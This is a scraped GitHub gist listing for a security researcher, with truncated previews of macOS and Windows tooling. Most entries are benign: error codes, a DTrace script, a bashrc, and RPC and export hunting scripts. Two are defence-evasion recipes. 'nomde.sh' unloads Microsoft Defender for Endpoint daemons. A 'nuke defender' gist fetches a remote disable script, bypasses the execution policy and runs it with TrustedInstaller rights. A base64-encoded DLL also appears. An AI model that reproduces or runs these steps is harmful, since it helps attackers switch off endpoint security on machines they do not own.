Skip to content

Instantly share code, notes, and snippets.

View p4yl0ad's full-sized avatar
👲

p4yl0ad

👲
121 followers · 634 following
View GitHub Profile
@p4yl0ad
p4yl0ad / blah.c
Last active January 20, 2024 17:24
XPC Errors
// security error -9999
// -67030 = Error: 0xFFFEFA2A -67030 invalid Info.plist (plist or signature have been modified
// -67050 = Error: 0xFFFEFA16 -67050 code failed to satisfy specified code requirement(s)
// -67062 = Error: 0xFFFEFA0A -67062 code object is not signed at all
// -67065 = Error: 0xFFFEFA07 -67065 host has no guest with the requested attributes
@p4yl0ad
p4yl0ad / hardlinktest.m
Last active December 28, 2023 20:34
poc to test symbolic link for specific target
/* gcc -framework Foundation hardlinktest.m -o hardlinktest */
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[]) {
@autoreleasepool {
if (argc < 2) {
NSLog(@"Usage: hardlinktest <path>");
return 1; // Indicate error
}
@p4yl0ad
p4yl0ad / nomde.sh
Last active December 8, 2023 19:45
nomde.sh
sudo mv /Library/LaunchDaemons/com.microsoft.autoupdate.helper.plist /Library/LaunchDaemons/old.com.microsoft.autoupdate.helper.plist
sudo mv /Library/LaunchDaemons/com.microsoft.dlp.install_monitor.plist /Library/LaunchDaemons/old.com.microsoft.dlp.install_monitor.plist
sudo mv /Library/LaunchDaemons/com.microsoft.fresno.plist /Library/LaunchDaemons/old.com.microsoft.fresno.plist
sudo mv /Library/LaunchDaemons/com.microsoft.fresno.uninstall.plist /Library/LaunchDaemons/old.com.microsoft.fresno.uninstall.plist
sudo launchctl bootout system/com.microsoft.fresno.uninstall
sudo launchctl bootout system/com.microsoft.dlp.install_monitor
sudo launchctl bootout system/com.microsoft.fresno
sudo launchctl bootout system/com.microsoft.fresno.uninstall
sudo launchctl bootout system/com.microsoft.autoupdate.helper
@p4yl0ad
p4yl0ad / newproc.d
Created December 3, 2023 19:17
newproc.d dtrace script from macOS
#!/usr/sbin/dtrace -s
/*
* newproc.d - snoop new processes as they are executed. DTrace OneLiner.
*
* This is a DTrace OneLiner from the DTraceToolkit.
*
* 15-May-2005 Brendan Gregg Created this.
*/
/*
@p4yl0ad
p4yl0ad / .bashrc
Last active November 10, 2023 23:20
macOS bashrc
# chsh -s /bin/bash
# Settings -> Users & Groups -> Right Click User ->
# MISC ALIAS COMMANDS
alias dir='ls -lah'
alias ls='ls -lah'
alias ipconfig='ifconfig'
alias cls='clear'
# MISC USEFUL SHORTCUTS
@p4yl0ad
p4yl0ad / export-hunt.ps1
Last active November 13, 2023 11:12
$searchterm = "IID_IWSCProductList"
$dumpbinpath = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\dumpbin.exe"
$x64_pathtosearch = "C:\Windows\System32\"
$x86_pathtosearch = "C:\Windows\SysWOW64\"
$stamp = (Get-Date).ToString("yyyy-mm-dd_HH-mm-ss")
$logpath = "C:\Users\user\Desktop\Initialize_hunt-$stamp.log"
@p4yl0ad
p4yl0ad / rpc-hunt.ps1
Created October 30, 2023 21:06
rpc-hunt.ps1
# https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html#rpc-servers
Get-ChildItem -Path "C:\Windows\System32\" -Filter "*.exe" -Recurse -ErrorAction SilentlyContinue | % { $out=$(C:\"Program Files (x86)"\"Microsoft Visual Studio 14.0"\VC\bin\dumpbin.exe /IMPORTS:rpcrt4.dll $_.VersionInfo.FileName); If($out -like "*RpcServerListen*"){ Write-Host "[+] Exe starting RPC Server: $($_.VersionInfo.FileName)"; Write-Output "[+] $($_.VersionInfo.FileName)`n`n $($out|%{"$_`n"})" | Out-File -FilePath EXEs_RpcServerListen.txt -Append } }
@p4yl0ad
p4yl0ad / gist:a667c8f2670ddabd1822bb8520aa68e9
Last active November 23, 2023 22:55
nuke defender

Download "advanced run" from nirsoft Spawn a powershell process with trustedinstaller perms and run the following with the -delete flag https[:]//raw.githubusercontent.com/jeremybeaume/tools/master/disable-defender.ps1

irm https://raw.githubusercontent.com/jeremybeaume/tools/master/disable-defender.ps1 -Outfile disable-defender.ps1
Set-ExecutionPolicy Bypass -Scope LocalMachine
. .\disable-defender.ps1
@p4yl0ad
p4yl0ad / ldap-cheatsheet.md
Last active March 19, 2024 01:53
ldap cheatsheet

ldapsearch cheatsheet

SCCM

ldapsearch (objectClass=mSSMSManagementPoint) cn,name,dNSHostName,mSSMSSiteCode,mSSMSMPName 0 ""

Maybe these too, need to experiment

mSSMSSite
mSSMSServerLocatorPoint
@p4yl0ad
p4yl0ad / AlertEntryx86.dll
Created October 12, 2023 11:32
base64 AlertEntryx86.dll
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB1ieV+MeiLLTHoiy0x6IstOJAYLTXoiy1jnY4sIOiLLWOdjyw76IstY52ILDPoiy1jnYosNeiLLXqQiiw26IstMeiKLXboiy3wnYIsM+iLLfCdiyww6Ist8J10LTDoiy3wnYksMOiLLVJpY2gx6IstAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQDY2CdlAAAAAAAAAADgAAIhCwEOHQAmAAAAIAAAAAAAAIsqAAAAEAAAAEAAAAAAABAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAkAAAAAQAAAAAAAACAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAgEsAAFAAAADQSwAAoAAAAABwAAD4AAAAAAAAAAAAAAAAAAAAAAAAAACAAABsAwAAAEMAAHAAAAAAAAAAAAAAAAAAAAAAAAAAQEQAABgAAABwQwAAQAAAAAAAAAAAAAAAAEAAAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAA8kAAAAEAAAACYAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACSEgAAAEAAAAAUAAAAKgAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAnAQAAABgAAAAAgAAAD4AAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAPgAAAAAcAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAABsAwAAAIAAAAAEAAAAQgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA